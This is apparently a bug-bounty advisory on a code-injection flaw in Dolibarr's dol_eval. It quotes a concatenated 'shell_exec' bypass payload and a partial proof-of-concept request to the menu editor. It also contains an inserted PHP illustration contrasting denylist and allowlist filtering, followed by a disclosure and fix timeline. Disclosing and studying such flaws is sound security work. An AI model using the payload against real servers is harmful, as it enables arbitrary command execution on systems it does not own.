Code Injection in dolibarr/dolibarr

Reported on Feb 28th 2022

Improper sanitization of PHP function names leads to the ability to inject arbitrary PHP code and run arbitrary commands on the file system. In the function "dol_eval" in the file "dolibarr/htdocs/core/lib/functions.lib.php", dangerous PHP functions are sanitized using "str_replace", which can be bypassed with the following code in the $s parameter:

('she'.'ll_'.'ex'.'ec')('<ANY SYSTEM SHELL COMMAND HERE>')
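As an added illustration (not Dolibarr's own code or its fix), the following PHP puts a str_replace denylist of the kind described next to a token-based allowlist that rejects the concatenated-name form above without ever evaluating it. The allowed function list and the two sample expressions are assumptions for this example.

```php
<?php
// Added illustration, not Dolibarr's code: a str_replace denylist on raw expression
// text (the pattern described for dol_eval) beside a token-based allowlist. Nothing is eval()'d.

// Weak check: blank out forbidden function names in the source text. Pieces such as
// 'she'.'ll_'.'ex'.'ec' never match, so the text reaches eval() unchanged and PHP
// resolves the callable name only at run time.
function denylist_filter(string $s): string {
    $forbidden = ['shell_exec', 'exec', 'system', 'passthru', 'eval'];
    return str_replace($forbidden, '__forbidden__', $s);
}

// Hardened check: tokenize and accept only a small, explicit grammar.
// $allowedFunctions is an assumption for this example; adjust per deployment.
function is_safe_expression(string $s): bool {
    $allowedFunctions = ['strlen', 'intval', 'round'];
    $allowedTokens = [T_VARIABLE, T_LNUMBER, T_DNUMBER, T_CONSTANT_ENCAPSED_STRING,
        T_WHITESPACE, T_IS_EQUAL, T_IS_NOT_EQUAL, T_IS_GREATER_OR_EQUAL,
        T_IS_SMALLER_OR_EQUAL, T_BOOLEAN_AND, T_BOOLEAN_OR];
    $allowedChars = ['(', ')', '+', '-', '*', '/', '.', '<', '>', '!', ','];
    $tokens = token_get_all('<?php ' . $s);
    array_shift($tokens);            // drop the T_OPEN_TAG we prepended
    $prev = null;                    // previous non-whitespace token
    foreach ($tokens as $tok) {
        if (is_array($tok)) {
            [$id, $text] = $tok;
            if ($id === T_WHITESPACE) continue;
            if ($id === T_STRING) {  // bare identifier: allowlisted function names only
                if (!in_array(strtolower($text), $allowedFunctions, true)) return false;
            } elseif (!in_array($id, $allowedTokens, true)) {
                return false;        // casts, ->, ::, \, comments, heredocs, "$x" ...
            }
        } else {
            if (!in_array($tok, $allowedChars, true)) return false;  // [ ] { } $ ` " ; ...
            // '(' may only open a call on an allowlisted name or group a sub-expression;
            // after ')', a string literal or a variable it would start a dynamic call.
            if ($tok === '(' && ($prev === ')' || (is_array($prev)
                && in_array($prev[0], [T_CONSTANT_ENCAPSED_STRING, T_VARIABLE], true)))) {
                return false;
            }
        }
        $prev = $tok;
    }
    return true;
}

$bypass = "('she'.'ll_'.'ex'.'ec')('<command>')";   // form quoted in the report
var_dump(denylist_filter($bypass) === $bypass, is_safe_expression($bypass),
    is_safe_expression('round($total) > 100 && strlen($ref) == 8'));
```

The first var_dump value shows whether the denylist altered the bypass string at all; the other two show how the allowlist treats the bypass and a plain comparison expression.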

Proof of Concept

A user with rights to add menus to the system can exploit this vulnerability with the following request:

POST /htdocs/admin/menus/edit.php?action=add&token=84da28fc90b6abc2238f2e0da2e5ee10&menuId=0 HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
Cookie: <COOKIE>
Upgrade-Insecure-Requests: 1



This vulnerability makes it possible to run arbitrary commands on the file system.

We are processing your report and will contact the dolibarr team within 24 hours. 3 months ago
We have contacted a member of the dolibarr team and are waiting to hear back 3 months ago
Laurent Destailleur validated this vulnerability 3 months ago
d3addog has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on 2a48dd 3 months ago
Laurent Destailleur has been awarded the fix bounty